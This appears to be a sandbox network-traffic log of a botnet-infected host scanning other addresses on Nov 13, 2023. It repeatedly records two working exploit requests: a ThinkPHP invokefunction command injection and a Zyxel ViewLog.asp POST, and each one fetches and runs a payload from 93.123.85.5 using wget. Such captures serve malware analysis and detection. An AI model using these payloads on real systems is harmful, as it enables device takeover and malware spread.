                                                              Nov 13, 2023 22:19:00.941593885 CET7557OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:08.364558935 CET8458OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:23.210725069 CET10289OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.902853966 CET14019OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              3192.168.2.234494294.120.12.2198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.692373037 CET389OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:02.453282118 CET556OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:04.628909111 CET773OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:08.980302095 CET1246OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.427222013 CET2213OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:35.089149952 CET4433OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:09.900448084 CET8710OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              3094.33.127.2338080192.168.2.2344594
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.620524883 CET1536INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 22:50:52 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              300192.168.2.235836088.197.97.7380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:54.385118961 CET6732OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:54.727425098 CET6742INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:54 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 301
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              301192.168.2.233670088.136.242.10380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:54.650031090 CET6734OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:55.568439960 CET6852OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:57.422056913 CET7091OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:01.197514057 CET7575OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:08.620654106 CET8487OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:23.466770887 CET10305OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.902853012 CET14019OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              302192.168.2.234322894.120.6.428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.121059895 CET6844OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              303192.168.2.234894294.120.26.1598080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.122148991 CET6845OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              304192.168.2.234687462.202.45.1168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.420022011 CET6848OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:55.727516890 CET6914INHTTP/1.1 401
                                                              Set-Cookie: JSESSIONID=8F7B41FD61D4A91EB4457702B3D37B1E; Path=/; HttpOnly
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1; mode=block
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: 0
                                                              Vary: Origin
                                                              Vary: Access-Control-Request-Method
                                                              Vary: Access-Control-Request-Headers
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 21:18:55 GMT
                                                              Keep-Alive: timeout=60
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              305192.168.2.234031894.122.229.328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.466056108 CET6849OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              306192.168.2.233682494.121.97.1888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.475713968 CET6850OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              307192.168.2.234645031.128.212.698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:55.785167933 CET6937OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.151662111 CET6967INHTTP/1.1 500 Internal Server Error
                                                              Content-Type: text/html; charset=utf-8
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'none'
                                                              Strict-Transport-Security: max-age=3600
                                                              Content-Length: 130
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              308192.168.2.235036631.33.37.1878080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.111201048 CET6964OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.427944899 CET6970INHTTP/1.1 404 Not Found
                                                              Date: Tue, 03 Jan 2023 18:22:31 GMT
                                                              Server: web
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              309192.168.2.234966231.136.117.458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:56.123883009 CET6965OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:59.149775028 CET7321OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.292959929 CET8078OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:17.323465109 CET9577OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.664172888 CET12624OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
